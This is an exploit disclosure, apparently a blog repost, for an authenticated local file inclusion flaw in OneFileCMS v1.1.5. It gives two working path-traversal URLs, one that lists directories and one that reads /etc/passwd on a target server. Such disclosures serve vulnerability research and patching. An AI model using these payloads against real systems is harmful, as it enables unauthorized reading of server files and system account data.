RSS

OneFileCMS v.1.1.5 Local File Inclusion Vulnerability

16 Mar


# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: –
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14

===============
Description
===============
OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.

=======================================================
[!] All vulnerabilities requires authentication. [!]
=======================================================

Directory Listing, using the “i” parameter:
http://TARGET/onefilecms/onefilecms.php?i=../../../../

Read local files, using the “f” parameter:
http://TARGET/onefilecms/onefilecms.php?f=../../../../etc/passwd

 
Leave a comment

Posted by on March 16, 2012 in Exploits

 

Tags: , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
Follow

Get every new post delivered to your Inbox.

%d bloggers like this: